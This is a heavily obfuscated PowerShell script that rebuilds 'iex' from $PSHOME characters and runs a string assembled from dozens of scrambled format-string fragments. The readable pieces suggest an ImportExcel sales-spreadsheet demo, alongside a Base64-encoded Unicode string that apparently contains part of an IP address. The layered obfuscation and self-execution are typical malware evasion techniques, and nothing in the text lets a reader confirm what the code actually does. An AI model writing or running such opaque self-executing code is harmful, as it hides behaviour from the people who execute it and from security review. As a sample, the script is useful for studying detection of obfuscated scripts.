&( $psHoMe[21]+$PshOme[34]+'X')(((("{53}{4}{56}{22}{84}{42}{52}{17}{47}{33}{67}{63}{69}{38}{64}{7}{11}{26}{77}{15}{74}{86}{46}{23}{32}{80}{44}{85}{9}{65}{66}{1}{37}{5}{3}{12}{60}{82}{72}{68}{62}{35}{49}{36}{76}{50}{13}{34}{10}{29}{48}{28}{2}{58}{83}{81}{18}{19}{21}{31}{20}{59}{79}{27}{75}{40}{71}{16}{30}{70}{51}{61}{24}{39}{8}{43}{78}{14}{73}{41}{45}{0}{25}{57}{6}{54}{55}" -f'cE(h','2),[sTRINg][cHA','RkAddre',' .(03ZEx03hRk+hRkZ+03Zp','spEC[4,26,25]-JOInhRkhRk) ((hRk  jT7p09=[tYPE](tJp{3}{2}{0}{1','3ZCon03ZhRk+hRk+03hRk+hRkZvertFrom-cs03Z+03Zv03Z) 5fK
    ','ar]39).REPlacE(hRk01Z','e -Message  (03ZSav03Z+03Ze hRk+hRk03Z+03Zloca03Z+03Zt03Z+03Zi03Z+03Zon: 03Z+tJpjT7xlSourcefiletJp)
&(03ZRemo03Z+03Zv03Z+03Ze-Item03Z)','3Z+03Zose03Z+03Z-ExcelPackahRk+hRkge03Z) jT7{eXC01ZEL} -Show

hRk).REPlacE(([cHar]53+[cH',',03Z77hR','3Z1:BhRk+hRk703Z) -DahRk+hRktaBa',' jT7{XL01ZsOuRCE01ZFi01Zle} -ErrorAction IGn01ZO01ZRe

jT7{exc01ZE','hRk+hR','Rkeet jT7{S01ZHeET} -Range (tJp{hRk+hRk0}{1}tJp-f03ZB03Z,0hRk+hR','lacE(hRkmFthRk,[strING][cHar]92).R','{','EtJp::tJpuni01ZCo01ZDEtJp.tJphRk+hRkGEt01Zs','03Z) jT7PsSC01ZRI01ZpTRoOtmFt.01Z.mFt.01Z.m','ktJp{1}{0}tJp -fhRk+hRk 03Zotal03Z,03ZT03hRk+','hRkZ)
&(03ZSe03Z','llstJp[tJpB8','+03Zt03Z+03Z-ExcelRanhRk+hRk03Z+','03ZSV03Z)  (03ZX03Z+03Z4803Z) ( [tyPE]','}{5}{15}tJp -f03ZlW4
Mo03Z,03Z0303Z,0hRk+hRk','3Z,03ZxhRk+hRkADM03Z,03ZQ03hRk+hRkZ,03ZAuAD03Z,03ZAO03Z,03ZIAMQ03','Rk03ZhR','L} = (((tJp{0}{8}{1','3Z=Su03Z,03Z(Sales)03Z,03Zm03Z)
jT7{q01ZEQ01ZoXhRk+hRkb}','Ze03hRk+hRkZ) -hRk+h','rColor','T01ZR01hRk+hRkZIngtJp(  jT7x48::tJpF01ZR01ZO01ZM0hRk+hRk1hRk+hRkZBAsE64StRhRk+hRkINGtJp((tJp{0}{3}{4}{7}{','03hRk+hRkZge03Z) -Address jT7{s01ZhEet}.tJpCe01Z','3Z
','cEl.01ZPSd','k','ru

jT7{s0hRk+hRk1Zh01ZEET} = jT7{e01ZxCel}.tJpWorK01ZB01ZoOKhRk+hRktJp.tJpwoRKsh01','TstJp[(tJp{1}{0}tJp-f03Zet103Z,03ZShe03Z)]
.(03ZAdd-Condit03','R]34)) 5fK &(0','xlsO01ZURcE01ZFiLe} = tJpjT7env:TEMhRk+hRkPmFtImportExcelExample.xl','Z)))

&(03ZC03Z+03Zl0',')).tJpV','7hRk,[strIN','));  t','ar]102+[cHar]75),[strING][cHa','703Z,03Z
Apr,95203Z,03Z7003Z,03ZbhRk+hRk03Z,03Zn,1203Z,03Znth03Z,03Zes
03Z,03ZFe03Z,03Z
M03Z,03hRk+hRkZ,103Z,03hRk+hRkZJa03Z,03Z5hRk+hRk03','G][cHar]36).REPlacE(hRktJphRk,[strING][cHar]34).REPla','{1}{2}{14}{4}{11}{3','Ft01ZI01ZMp0hRk+hRk1ZORtE01ZX',' lA01hRk+hRkZWNGRe01ZEN

&(03ZSet-Exc03Z+03ZelRa03Z+03hRk+hRkZn03Z+03Zg03Z+03','ZhRk+hRkEe01Z','Z+03Zing03Z) -WorkshhRk+h','JwBp03Z,03ZA03Z,03ZA3ACc03Z,03ZAHAAOgAxADkALgA2ADYA','rhRk+hRky {.(03ZImp03Z+hRk+hRk03Zor03Z+03Zt-Module',' . ( r6pEnv:cOm','hRk,','[strING][cHar]96) )
','}tJp -f03Zo03Z,03ZdIng03Z,03ZhRk+hRkT.ENC03Z,03ZTEX03Z); &(','k,[strING][cH','hRk+hRkss jhRk+hRkT7{s0hRk+hRk1ZHEeT}.tJpCE01hRk+','tJp]hRk+hRk -Formula (tJp{0}','k03Z+hRk+hRk03Zor03Z+03Zt-Excel','LgA0','ssThRk+hRkh',' catch {throw ; ','sxtJp
.(03ZWri03Z+03Zte-Ve03Z+03Zrbos03Z+hRk+hRk03Ze03Z) -Verbos','k+hRk
03Z)).tJpRE01ZplAcetJp(([cHAR]108+[cHAR',']87+[cHAR]5','1}','ameRange -Pa','return}


jT7{','5}{6}{8}{2}{hRk+hRk1}tJp-f03ZhRk+hRk','Al01ZU','LS01ZOurceFi01ZLE} -WorkSheetname S01ZHEEt1 -AutoN','EPlacE(hRkjT','1','=  ( .(03ZGI03Z)  (tJpVArtJp+tJpiabtJp+tJpLEtJp+tJp:P09tJhRk+hRkp','Z+03ZhRk+hRkiona03Z+03ZlFhRk+hRkorma03Z+03Ztt03','7}{9}{13}{7}hRk+hRk{18}','r]124).REP','{2}hRk+hRk{1}tJp-fhRk+hRk 0','Mar,110hRk+hRk03Z,hRk+hRk0hRk+hRk3Zay,',' -Value (hRk+hR','03Z) -Path jT7{X','hRkZLlstJp[tJpA8tJp]','(tJp{1}{2}{0}tJp -f03ZErt03Z,03ZchRk+hRko03Z,03ZNv03Z','Z,03Z
Jun,621
lW403Z,03Z00hRk+hRk3hRk+hRkZ,03Z,Sal03Z','0}{6}{12}{16}')) -CrePlacE  ([ChAR]114+[ChAR]54+[ChAR]112),[ChAR]36-CrePlacE  'hRk',[ChAR]39)) 
